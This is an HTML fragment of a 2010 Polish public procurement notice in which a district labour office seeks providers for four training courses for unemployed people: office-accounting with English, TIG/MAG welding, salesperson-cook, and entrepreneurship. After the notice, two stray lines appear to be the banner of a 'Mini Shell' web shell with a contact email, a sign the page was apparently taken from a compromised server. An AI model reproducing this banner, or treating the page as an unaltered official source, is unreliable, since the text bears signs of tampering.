<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu
Część 1
Pracownik administracyjno-księgowy z językiem angielskim.
Szkolenie jest przeznaczone  dla 14 bezrobotnych.
Usługi szkolenia zawodowego - 80530000-8  zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 26.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu
Część 2
Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą TIG 
Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą MAG
Szkolenie jest przeznaczone  dla 14  bezrobotnych.
Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 26.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu
Część 3
Sprzedawca-kucharz
Szkolenie jest  przeznaczone dla 14 bezrobotnych.
Usługi szkolenia zawodowego - 80530000-8  zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 26.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu
Część4
Przedsiębiorczość. Jak założyć i prowadzić własną firmę.
Szkolenie jest przeznaczone dla 30 bezrobotnych  
Usługi szkolenia w dziedzinie zarządzania - 80532000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com